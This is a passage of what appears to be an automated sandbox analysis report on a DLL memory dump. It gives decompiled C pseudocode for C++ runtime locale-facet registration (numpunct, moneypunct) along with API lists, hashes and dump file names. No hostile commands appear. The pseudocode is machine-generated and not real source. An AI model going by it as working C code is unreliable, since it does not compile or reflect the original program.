				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t242 - 0x14, 0);
				_t231 =  *0x6d546de0; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6D46161C(0x6d546d8c);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6D4866BA(_t242 - 0x14);
					return E6D4A0075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6D491471(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t242 - 0x20);
							E6D4A3D74(_t242 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t225, _t231, 0x14);
							E6D486653(_t242 - 0x14, 0);
							_t232 =  *0x6d546dfc; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6D46161C(0x6d546da8);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6D4866BA(_t242 - 0x14);
								return E6D4A0075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6D4914EC(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t242 - 0x20);
										E6D4A3D74(_t242 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t172, _t226, _t232, 0x14);
										E6D486653(_t242 - 0x14, 0);
										_t233 =  *0x6d546dcc; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6D46161C(0x6d546d80);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6D4866BA(_t242 - 0x14);
											return E6D4A0075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6D491558(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t242 - 0x20);
													E6D4A3D74(_t242 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t172, _t227, _t233, 0x14);
													E6D486653(_t242 - 0x14, 0);
													_t234 =  *0x6d546e00; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6D46161C(0x6d546dac);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6D4866BA(_t242 - 0x14);
														return E6D4A0075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6D4915C4(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t242 - 0x20);
																E6D4A3D74(_t242 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t172, _t228, _t234, 0x14);
																E6D486653(_t242 - 0x14, 0);
																_t235 =  *0x6d546dd0; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6D46161C(0x6d546d60);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6D4866BA(_t242 - 0x14);
																	return E6D4A0075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6D49162A(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6D461438(_t207);
																			E6D4A3D74(_t242 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6d4ec0c4;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6D49542F(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6D4A0075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6D486FD3(__eflags, _t229);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6d546dd0 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6D486FD3(__eflags, _t228);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6d546e00 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6D486FD3(__eflags, _t227);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6d546dcc = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6D486FD3(__eflags, _t226);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6d546dfc = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6D486FD3(__eflags, _t225);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6d546de0 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48F9F8
std::_Lockit::_Lockit.LIBCPMT ref: 6D48FA02
int.LIBCPMT ref: 6D48FA19

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

numpunct.LIBCPMT ref: 6D48FA3C
std::_Facet_Register.LIBCPMT ref: 6D48FA53
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48FA73
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48FA91

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: feb34e8717756e17e73a0063b3157a0e15443a53fddfe4b77fb57d8c8a4219c4
Instruction ID: df4462f590d5526111450a937ccda4f043487feafc84dee4604a2156322f8cd7
Opcode Fuzzy Hash: feb34e8717756e17e73a0063b3157a0e15443a53fddfe4b77fb57d8c8a4219c4
Instruction Fuzzy Hash: 18119E758086299BCF05EBA4C844EEDB775AF94354F2A800DD612AB291DB74DD0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D49BA8A, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6D49BA8A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t154 - 0x14, 0);
				_t147 =  *0x6d546e38; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6D46161C(0x6d546e18);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6D46171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6D4866BA(_t154 - 0x14);
					return E6D4A0075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6D49C1A4(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t154 - 0x20);
							E6D4A3D74(_t154 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t143, _t147, 0x14);
							E6D486653(_t154 - 0x14, 0);
							_t148 =  *0x6d546e40; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6D46161C(0x6d546e20);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6D46171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6D4866BA(_t154 - 0x14);
								return E6D4A0075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6D49C229(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t154 - 0x20);
										E6D4A3D74(_t154 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t110, _t144, _t148, 0x14);
										E6D486653(_t154 - 0x14, 0);
										_t149 =  *0x6d546e44; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6D46161C(0x6d546e24);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6D46171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6D4866BA(_t154 - 0x14);
											return E6D4A0075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6D49C295(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6D461438(_t131);
													E6D4A3D74(_t154 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6d4ec414;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6D49D028(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6D4A0075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6D486FD3(__eflags, _t145);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6d546e44 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6D486FD3(__eflags, _t144);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6d546e40 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6D486FD3(__eflags, _t143);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6d546e38 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D49BA91
std::_Lockit::_Lockit.LIBCPMT ref: 6D49BA9B
int.LIBCPMT ref: 6D49BAB2

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

moneypunct.LIBCPMT ref: 6D49BAD5
std::_Facet_Register.LIBCPMT ref: 6D49BAEC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49BB0C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49BB2A

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: ae8532c3cbfeadc7c4e962046d372e82db99c56689b563ae6b985ee54400e7c0
Instruction ID: da505fb6a189cd5ecf423827a07e5cf018226729c84658d822919194077d4ccb
Opcode Fuzzy Hash: ae8532c3cbfeadc7c4e962046d372e82db99c56689b563ae6b985ee54400e7c0
Instruction Fuzzy Hash: 2611E3768081159BCF01EBA4C884EFEBBB4AF90314F2A400CD611AB394DB709D01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F567, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F567(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t181;
				signed int _t182;
				void* _t194;
				void* _t207;
				void* _t220;
				void* _t233;
				void* _t246;
				void* _t259;
				void* _t272;
				void* _t285;
				void* _t298;
				void* _t311;
				void* _t324;
				signed int _t473;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				void* _t550;

				_t510 = __edx;
				_t389 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t550 - 0x14, 0);
				_t525 =  *0x6d546df8; // 0x0
				 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
				 *(_t550 - 0x10) = _t525;
				_t181 = E6D46161C(0x6d546da4);
				_t392 =  *((intOrPtr*)(_t550 + 8));
				_t182 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t181);
				_t512 = _t182;
				if(_t182 != 0) {
					L5:
					E6D4866BA(_t550 - 0x14);
					return E6D4A0075(_t512);
				} else {
					if(_t525 == 0) {
						_push( *((intOrPtr*)(_t550 + 8)));
						_push(_t550 - 0x10);
						__eflags = E6D491127(__ebx, _t392, __edx, _t512, _t525) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t550 - 0x20);
							E6D4A3D74(_t550 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t512, _t525, 0x14);
							E6D486653(_t550 - 0x14, 0);
							_t526 =  *0x6d546df4; // 0x0
							 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
							 *(_t550 - 0x10) = _t526;
							_t194 = E6D46161C(0x6d546da0);
							_t399 =  *((intOrPtr*)(_t550 + 8));
							_t513 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t194);
							__eflags = _t513;
							if(_t513 != 0) {
								L12:
								E6D4866BA(_t550 - 0x14);
								return E6D4A0075(_t513);
							} else {
								__eflags = _t526;
								if(_t526 == 0) {
									_push( *((intOrPtr*)(_t550 + 8)));
									_push(_t550 - 0x10);
									__eflags = E6D4911AB(_t389, _t399, __edx, _t513, _t526) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t550 - 0x20);
										E6D4A3D74(_t550 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t389, _t513, _t526, 0x14);
										E6D486653(_t550 - 0x14, 0);
										_t527 =  *0x6d546dc8; // 0x0
										 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
										 *(_t550 - 0x10) = _t527;
										_t207 = E6D46161C(0x6d546d7c);
										_t406 =  *((intOrPtr*)(_t550 + 8));
										_t514 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t207);
										__eflags = _t514;
										if(_t514 != 0) {
											L19:
											E6D4866BA(_t550 - 0x14);
											return E6D4A0075(_t514);
										} else {
											__eflags = _t527;
											if(_t527 == 0) {
												_push( *((intOrPtr*)(_t550 + 8)));
												_push(_t550 - 0x10);
												__eflags = E6D491230(_t389, _t406, __edx, _t514, _t527) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t550 - 0x20);
													E6D4A3D74(_t550 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t389, _t514, _t527, 0x14);
													E6D486653(_t550 - 0x14, 0);
													_t528 =  *0x6d546dc4; // 0x0
													 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
													 *(_t550 - 0x10) = _t528;
													_t220 = E6D46161C(0x6d546d78);
													_t413 =  *((intOrPtr*)(_t550 + 8));
													_t515 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t220);
													__eflags = _t515;
													if(_t515 != 0) {
														L26:
														E6D4866BA(_t550 - 0x14);
														return E6D4A0075(_t515);
													} else {
														__eflags = _t528;
														if(_t528 == 0) {
															_push( *((intOrPtr*)(_t550 + 8)));
															_push(_t550 - 0x10);
															__eflags = E6D4912B4(_t389, _t413, _t510, _t515, _t528) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t550 - 0x20);
																E6D4A3D74(_t550 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t389, _t515, _t528, 0x14);
																E6D486653(_t550 - 0x14, 0);
																_t529 =  *0x6d546dd8; // 0x0
																 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																 *(_t550 - 0x10) = _t529;
																_t233 = E6D46161C(0x6d546d84);
																_t420 =  *((intOrPtr*)(_t550 + 8));
																_t516 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t233);
																__eflags = _t516;
																if(_t516 != 0) {
																	L33:
																	E6D4866BA(_t550 - 0x14);
																	return E6D4A0075(_t516);
																} else {
																	__eflags = _t529;
																	if(_t529 == 0) {
																		_push( *((intOrPtr*)(_t550 + 8)));
																		_push(_t550 - 0x10);
																		__eflags = E6D491339(_t389, _t420, _t510, _t516, _t529) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t550 - 0x20);
																			E6D4A3D74(_t550 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t389, _t516, _t529, 0x14);
																			E6D486653(_t550 - 0x14, 0);
																			_t530 =  *0x6d546db0; // 0x0
																			 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																			 *(_t550 - 0x10) = _t530;
																			_t246 = E6D46161C(0x6d546d64);
																			_t427 =  *((intOrPtr*)(_t550 + 8));
																			_t517 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t246);
																			__eflags = _t517;
																			if(_t517 != 0) {
																				L40:
																				E6D4866BA(_t550 - 0x14);
																				return E6D4A0075(_t517);
																			} else {
																				__eflags = _t530;
																				if(_t530 == 0) {
																					_push( *((intOrPtr*)(_t550 + 8)));
																					_push(_t550 - 0x10);
																					__eflags = E6D4913A1(_t389, _t427, _t510, _t517, _t530) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t550 - 0x20);
																						E6D4A3D74(_t550 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t389, _t517, _t530, 0x14);
																						E6D486653(_t550 - 0x14, 0);
																						_t531 =  *0x6d546ddc; // 0x0
																						 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																						 *(_t550 - 0x10) = _t531;
																						_t259 = E6D46161C(0x6d546d88);
																						_t434 =  *((intOrPtr*)(_t550 + 8));
																						_t518 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t259);
																						__eflags = _t518;
																						if(_t518 != 0) {
																							L47:
																							E6D4866BA(_t550 - 0x14);
																							return E6D4A0075(_t518);
																						} else {
																							__eflags = _t531;
																							if(_t531 == 0) {
																								_push( *((intOrPtr*)(_t550 + 8)));
																								_push(_t550 - 0x10);
																								__eflags = E6D491409(_t389, _t434, _t510, _t518, _t531) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t550 - 0x20);
																									E6D4A3D74(_t550 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t389, _t518, _t531, 0x14);
																									E6D486653(_t550 - 0x14, 0);
																									_t532 =  *0x6d546de0; // 0x0
																									 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																									 *(_t550 - 0x10) = _t532;
																									_t272 = E6D46161C(0x6d546d8c);
																									_t441 =  *((intOrPtr*)(_t550 + 8));
																									_t519 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t272);
																									__eflags = _t519;
																									if(_t519 != 0) {
																										L54:
																										E6D4866BA(_t550 - 0x14);
																										return E6D4A0075(_t519);
																									} else {
																										__eflags = _t532;
																										if(_t532 == 0) {
																											_push( *((intOrPtr*)(_t550 + 8)));
																											_push(_t550 - 0x10);
																											__eflags = E6D491471(_t389, _t441, _t510, _t519, _t532) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t550 - 0x20);
																												E6D4A3D74(_t550 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t389, _t519, _t532, 0x14);
																												E6D486653(_t550 - 0x14, 0);
																												_t533 =  *0x6d546dfc; // 0x0
																												 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																												 *(_t550 - 0x10) = _t533;
																												_t285 = E6D46161C(0x6d546da8);
																												_t448 =  *((intOrPtr*)(_t550 + 8));
																												_t520 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t285);
																												__eflags = _t520;
																												if(_t520 != 0) {
																													L61:
																													E6D4866BA(_t550 - 0x14);
																													return E6D4A0075(_t520);
																												} else {
																													__eflags = _t533;
																													if(_t533 == 0) {
																														_push( *((intOrPtr*)(_t550 + 8)));
																														_push(_t550 - 0x10);
																														__eflags = E6D4914EC(_t389, _t448, _t510, _t520, _t533) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t550 - 0x20);
																															E6D4A3D74(_t550 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t389, _t520, _t533, 0x14);
																															E6D486653(_t550 - 0x14, 0);
																															_t534 =  *0x6d546dcc; // 0x0
																															 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																															 *(_t550 - 0x10) = _t534;
																															_t298 = E6D46161C(0x6d546d80);
																															_t455 =  *((intOrPtr*)(_t550 + 8));
																															_t521 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t298);
																															__eflags = _t521;
																															if(_t521 != 0) {
																																L68:
																																E6D4866BA(_t550 - 0x14);
																																return E6D4A0075(_t521);
																															} else {
																																__eflags = _t534;
																																if(_t534 == 0) {
																																	_push( *((intOrPtr*)(_t550 + 8)));
																																	_push(_t550 - 0x10);
																																	__eflags = E6D491558(_t389, _t455, _t510, _t521, _t534) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t550 - 0x20);
																																		E6D4A3D74(_t550 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t389, _t521, _t534, 0x14);
																																		E6D486653(_t550 - 0x14, 0);
																																		_t535 =  *0x6d546e00; // 0x0
																																		 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																		 *(_t550 - 0x10) = _t535;
																																		_t311 = E6D46161C(0x6d546dac);
																																		_t462 =  *((intOrPtr*)(_t550 + 8));
																																		_t522 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t311);
																																		__eflags = _t522;
																																		if(_t522 != 0) {
																																			L75:
																																			E6D4866BA(_t550 - 0x14);
																																			return E6D4A0075(_t522);
																																		} else {
																																			__eflags = _t535;
																																			if(_t535 == 0) {
																																				_push( *((intOrPtr*)(_t550 + 8)));
																																				_push(_t550 - 0x10);
																																				__eflags = E6D4915C4(_t389, _t462, _t510, _t522, _t535) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t550 - 0x20);
																																					E6D4A3D74(_t550 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t389, _t522, _t535, 0x14);
																																					E6D486653(_t550 - 0x14, 0);
																																					_t536 =  *0x6d546dd0; // 0x0
																																					 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																					 *(_t550 - 0x10) = _t536;
																																					_t324 = E6D46161C(0x6d546d60);
																																					_t469 =  *((intOrPtr*)(_t550 + 8));
																																					_t523 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t324);
																																					__eflags = _t523;
																																					if(_t523 != 0) {
																																						L82:
																																						E6D4866BA(_t550 - 0x14);
																																						return E6D4A0075(_t523);
																																					} else {
																																						__eflags = _t536;
																																						if(_t536 == 0) {
																																							_push( *((intOrPtr*)(_t550 + 8)));
																																							_push(_t550 - 0x10);
																																							__eflags = E6D49162A(_t389, _t469, _t510, _t523, _t536) - 0xffffffff;
																																							if(__eflags == 0) {
																																								_t473 = _t550 - 0x20;
																																								E6D461438(_t473);
																																								E6D4A3D74(_t550 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e851f, _t389, _t523, _t536, 4);
																																								_t537 = _t473;
																																								 *(_t550 - 0x10) = _t537;
																																								 *((intOrPtr*)(_t537 + 4)) =  *((intOrPtr*)(_t550 + 0xc));
																																								_push( *((intOrPtr*)(_t550 + 0x14)));
																																								_t175 = _t550 - 4;
																																								 *_t175 =  *(_t550 - 4) & 0x00000000;
																																								__eflags =  *_t175;
																																								 *_t537 = 0x6d4ec0c4;
																																								 *((char*)(_t537 + 0x28)) =  *((intOrPtr*)(_t550 + 0x10));
																																								E6D49542F(_t389, _t473, _t510, _t523, _t537,  *_t175);
																																								return E6D4A0075(_t537,  *((intOrPtr*)(_t550 + 8)));
																																							} else {
																																								_t523 =  *(_t550 - 0x10);
																																								 *(_t550 - 0x10) = _t523;
																																								 *(_t550 - 4) = 1;
																																								E6D486FD3(__eflags, _t523);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t523 + 4))))();
																																								 *0x6d546dd0 = _t523;
																																								goto L82;
																																							}
																																						} else {
																																							_t523 = _t536;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t522 =  *(_t550 - 0x10);
																																					 *(_t550 - 0x10) = _t522;
